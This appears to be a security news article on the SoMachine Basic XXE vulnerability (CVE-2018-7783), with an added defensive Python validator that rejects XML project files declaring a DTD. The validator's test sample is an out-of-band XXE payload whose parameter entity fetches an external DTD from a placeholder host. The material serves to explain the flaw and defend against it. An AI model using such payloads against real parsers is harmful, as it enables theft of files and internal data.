Schneider Electric on Tuesday issued fixes for a vulnerability in its SoMachine Basic software, which could result in the disclosure and retrieval of arbitrary data.
The software in question is used to develop code for programmable logic controllers. Attackers can exploit a vulnerability in the XML parser within SoMachine Basic to launch an out-of-band remote arbitrary data retrieval attack.
“SoMachine Basic suffers from an XML External Entity (XXE) vulnerability using the DTD parameter entities technique, resulting in disclosure and retrieval of arbitrary data on the affected node via out-of-band (OOB) attack,” Schneider Electric said in a security notice. “The vulnerability is triggered when input passed to the xml parser is not sanitized while parsing the xml project/template file.”
Essentially, it means that several versions of SoMachine Basic have sites that accept XML documents as input. When an XML document is received, it needs to be parsed, which means turning it from a text file into structured data.
“The tools out there that do that are called XML parsers, and it turns out that in the XML spec, there’s support for features like adding a header in the doc, enabling the person creating the document to reference external documents or files,” explained Jeff Williams, CTO of Contrast Security, speaking to Threatpost.
Williams said an attacker could create a malicious XML file and upload it to this site. When the XML parser reads the file, it also reads the malicious header that the attacker added and attempts to bring in the external resource – which could reference files on the disk, or other file servers on the network.
“So an attacker could upload a malicious XML file, [and then] it pulls in resources from the disk, and then the program leaks those details out through the website,” said Williams. “That data could be anything on the internal network – including manufacturing data or personal data. A bigger risk is [the potential for] stealing IP, source code or files related to industrial processes.”
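The parser behaviour described above can be checked before a project or template file is imported. The following is an added defensive example, not code from Schneider Electric's notice or patch: it scans a file with Python's expat bindings, reports any DOCTYPE or entity declaration, and refuses to parse files that carry one. The function names, the sample element names and the `.invalid` URL are constructed for illustration.

```python
import xml.etree.ElementTree as ET
import xml.parsers.expat as expat

class UnsafeProjectFile(ValueError):
    """The file carries a DTD or is not well-formed; do not import it."""

def dtd_findings(data: bytes) -> list:
    """Scan a file with expat and list every DTD construct it declares.
    Nothing is fetched: no external-entity handler is installed and
    parameter-entity parsing is switched off."""
    findings = []
    parser = expat.ParserCreate()
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def on_doctype(name, system_id, public_id, has_internal_subset):
        findings.append(("doctype", name, system_id))

    def on_entity(name, is_param, value, base, system_id, public_id, notation):
        kind = "parameter-entity" if is_param else "general-entity"
        findings.append((kind, name, system_id))

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    try:
        parser.Parse(data, True)
    except expat.ExpatError as exc:
        raise UnsafeProjectFile(f"not well-formed: {exc}") from exc
    return findings

def load_project(data: bytes) -> ET.Element:
    """Parse a project/template file only if it declares no DTD at all."""
    findings = dtd_findings(data)
    if findings:
        raise UnsafeProjectFile(f"DTD content rejected: {findings}")
    return ET.fromstring(data)

# Constructed samples; element names and the .invalid URL are placeholders.
CLEAN = b'<?xml version="1.0"?><Project><Name>demo</Name></Project>'
SUSPECT = (b'<?xml version="1.0"?>\n'
           b'<!DOCTYPE Project [\n'
           b'  <!ENTITY % ext SYSTEM "http://collector.invalid/ext.dtd">\n'
           b'  %ext;\n'
           b']>\n<Project/>')

if __name__ == "__main__":
    print(load_project(CLEAN).tag)
    try:
        load_project(SUSPECT)
    except UnsafeProjectFile as err:
        print("rejected:", err)
```

Rejecting every DOCTYPE is stricter than disabling external entities alone, which suits file formats that have no legitimate need for a DTD.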
The vulnerability (CVE-2018-7783) was given a CVSS score of 8.6, which is considered “high,” according to Schneider Electric. However, while the vulnerability may put data at risk, SoMachine Basic is not a production ICS system, but rather is used in a development environment. As such, it incurs no material downtime and therefore would not have any urgency from a business perspective, according to Tom Parsons, senior director of product management at Tenable.
“The attack requires… user interaction,” he told Threatpost. “The victim would have to actively load/import a malicious file crafted by an attacker. So, it’s not an easy attack to execute, because an attacker can’t just remotely connect to the system and execute the exploit.”
Schneider Electric did not respond to questions from Threatpost, including whether an exploit of the vulnerability has been discovered.
“The cybersecurity team at Schneider Electric has collaborated with Applied Risk to ensure the exploit had been addressed after identification with an effective patch,” a spokesperson at Applied Risk, whose researcher Gjoko Krstic discovered the vulnerability, told Threatpost.
All versions of SoMachine Basic prior to v1.6 SP1 are impacted by the flaw. The manufacturing company said a fix is available for download online, or by using the Schneider Electric Software Update tool.
Schneider Electric has faced a bevy of vulnerabilities on its systems, including a critical remote code execution vulnerability in two Schneider Electric industrial control-related products in May and a critical vulnerability in its WonderWare Historian last year.
But security experts like Parsons said that industrial vendors, for their part, are becoming more aware of cybersecurity vulnerabilities on their operational technology-related hardware and software.
“Vulnerability types like remote service vulnerabilities are still common in OT systems, while in the IT world these have been displaced by application vulnerabilities,” Parsons told Threatpost. “This reflects that OT has only recently become a target for threat actors. But OT vendors are becoming much more aware and active in addressing vulnerabilities and providing patches, as OT becomes increasingly connected.”